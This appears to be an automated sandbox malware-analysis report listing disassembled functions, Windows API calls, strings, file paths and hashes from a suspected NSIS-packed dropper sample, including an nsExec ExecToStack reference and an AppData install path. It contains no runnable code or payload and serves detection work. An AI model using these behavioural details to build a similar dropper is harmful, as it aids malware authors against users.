Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction ID: 5555e847f210990d4306c473702a26b4278c0affe79ec1256b97cb42bd71170f
Opcode Fuzzy Hash: 673f315f3887413ad686258b59d5e48c26cbda3fe4b4ae472fabdc6907277f98
Instruction Fuzzy Hash: 60F17671D04229CBCF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7785A86CF45

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040849C,?,00000001,0040848C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00402154

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto
API String ID: 542301482-576767988
Opcode ID: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction ID: 385f74efd5c92971cc76d3b11bce30356dc3a3525802f9592d77ec9fc6b050a7
Opcode Fuzzy Hash: 7b419f7cc5428bd657f2702b6541b5900bb3e3068c4e1d41d275679f069c9ef6
Instruction Fuzzy Hash: E5412C75A00209AFCF00DFA4CD88AAD7BB5FF48314B20457AF915EB2D1DBB99A41CB54

Function 004064C6 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
FindClose.KERNEL32(00000000), ref: 004064DD

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction ID: 6f39d47423a9e3911ec825e8889a8cd4e4dbe9a09c05077791626206cca478a1
Opcode Fuzzy Hash: f4fd98db666761d1ec4a2d1f7e3b4d91bb1358fc4dad46a464095710d72655bf
Instruction Fuzzy Hash: FED012715151209BC2901B787F0C85B7A989F553317128E36F46AF22E0C738CC67869C

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction ID: f51a3655aa6281515c31db2bfa725e220f35cee11171475ca2a169fd8dd427bf
Opcode Fuzzy Hash: 3e9a8732800398192e1c9f1ab6abdede03672ac5056a1e2eca6c89b00c6797eb
Instruction Fuzzy Hash: 09F05E716001149BC711EBA4DE49AAEB374EF04324F10057BE515E31E1D6B499459B2A

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DAB
ShowWindow.USER32(?), ref: 00403DC8
DestroyWindow.USER32 ref: 00403DDC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF8
GetDlgItem.USER32(?,?), ref: 00403E19
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E2D
IsWindowEnabled.USER32(00000000), ref: 00403E34
GetDlgItem.USER32(?,00000001), ref: 00403EE2
GetDlgItem.USER32(?,00000002), ref: 00403EEC
SetClassLongW.USER32(?,000000F2,?), ref: 00403F06
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F57
GetDlgItem.USER32(?,00000003), ref: 00403FFD
ShowWindow.USER32(00000000,?), ref: 0040401E
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404030
EnableWindow.USER32(?,?), ref: 0040404B
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404061
EnableMenuItem.USER32(00000000), ref: 00404068
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404080
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404093
lstrlenW.KERNEL32(00423748,?,00423748,00429260), ref: 004040BC
SetWindowTextW.USER32(?,00423748), ref: 004040D0
ShowWindow.USER32(?,0000000A), ref: 00404204

Strings

H7B, xrefs: 004040A8

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: H7B
API String ID: 3282139019-2300413410
Opcode ID: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction ID: 25c141fc174ea51021f963d75397c5770897fb54822066ed0df1b6b59a0401a8
Opcode Fuzzy Hash: a49a5196493c1ae2f906a4e5a743ada2448b48f181a0c80ef13299000ff6ec98
Instruction Fuzzy Hash: EFC1CFB1644200FBDB216F61EE84D2B7B78EB98745F40097EF641B51F0CB3998529B2E

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

lstrcatW.KERNEL32(1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\r5yYt97sfB.exe"), ref: 00403A4D
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,771B3420), ref: 00403ACD
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\magmaet\clenched,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403AE0
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AEB
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\magmaet\clenched), ref: 00403B34

Part of subcall function 004060CA: wsprintfW.USER32 ref: 004060D7

RegisterClassW.USER32(00429200), ref: 00403B71
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B89
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BBE
ShowWindow.USER32(00000005,00000000), ref: 00403BF4
GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403C20
GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403C2D
RegisterClassW.USER32(00429200), ref: 00403C36
DialogBoxParamW.USER32(?,00000000,00403D6F,00000000), ref: 00403C55

Strings

_Nb, xrefs: 00403B50, 00403BB8
"C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 004039CF
RichEdit20W, xrefs: 00403C18, 00403C1E
RichEd32, xrefs: 00403C08
1033, xrefs: 004039EC, 00403A48
Control Panel\Desktop\ResourceLocale, xrefs: 00403A00
RichEd20, xrefs: 00403BFA
: Completed, xrefs: 00403A94, 00403A9D, 00403AAB, 00403AFA, 00403B00
H7B, xrefs: 004039F8
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00403A5C, 00403A64, 00403B07, 00403B0D, 00403B1D
.exe, xrefs: 00403ADA
RichEdit, xrefs: 00403C27
C:\Users\user~1\AppData\Local\Temp\, xrefs: 004039D1
.DEFAULT\Control Panel\International, xrefs: 00403A38

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2802542752
Opcode ID: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction ID: 56c0b88d72ef28cc24ab3b3da6b812fbe5e4610ed82a7e8ff487d4c0aa16eca4
Opcode Fuzzy Hash: ad5632daeb9ffc2eb022d86f5b9fa885925c4b3de087c127450ada2267c15868
Instruction Fuzzy Hash: E261C270240600BAD720AF66AD45F2B3A7CEB84B09F40447EF945B22E2DB7D69118A3D

Function 00402E41 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402E55
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r5yYt97sfB.exe,00000400), ref: 00402E71

Part of subcall function 00405D58: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00405D5C
Part of subcall function 00405D58: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\r5yYt97sfB.exe,C:\Users\user\Desktop\r5yYt97sfB.exe,80000000,00000003), ref: 00402EBA
GlobalAlloc.KERNELBASE(00000040,?), ref: 00403001

Strings

C:\Users\user\Desktop\r5yYt97sfB.exe, xrefs: 00402E5B, 00402E6A, 00402E7E, 00402E9B
"C:\Users\user\Desktop\r5yYt97sfB.exe", xrefs: 00402E4A
Inst, xrefs: 00402F28
Null, xrefs: 00402F3A
C:\Users\user\Desktop, xrefs: 00402E9C, 00402EA1, 00402EA7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403098
soft, xrefs: 00402F31
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402E4B, 00403019
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040304A
Error launching installer, xrefs: 00402E91
}UI, xrefs: 00402F49, 00402FA9

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\r5yYt97sfB.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\r5yYt97sfB.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}UI
API String ID: 2803837635-548520004
Opcode ID: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction ID: 78d4ac72044dd1d4b64dcf5cb9e774c3474f7f20f7d9c099438d2fbc404b67ba
Opcode Fuzzy Hash: 1be99897c4a46a5915ab510cfd1f8eff2a8e5667c51a4e1e053d1b6638955747
Instruction Fuzzy Hash: 6961E231900215AFDB209F75DD49B9E7AB8AB04359F20817FFA00B62C1CBB99A458B5D

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?,?,00000031), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto,?,?,00000031), ref: 004017CD

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll, xrefs: 0040182D, 00401849
C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto, xrefs: 00401796
ExecToStack, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
artikulationer\Udsorteringerne, xrefs: 00401819, 00401837

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nss7012.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched\Gruppekonto$ExecToStack$artikulationer\Udsorteringerne
API String ID: 1941528284-611024608
Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

Function 004052E2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Strings

Completed, xrefs: 00405303, 00405313, 00405319, 0040533C, 00405348

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414649899.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_r5yYt97sfB.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

Function 004057B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\), ref: 004057F4
GetLastError.KERNEL32 ref: 00405808
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
GetLastError.KERNEL32 ref: 00405827

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057D7
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8

Memory Dump Source

Source File: 00000001.00000002.1414399902.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1414364022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414419921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1414438685.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
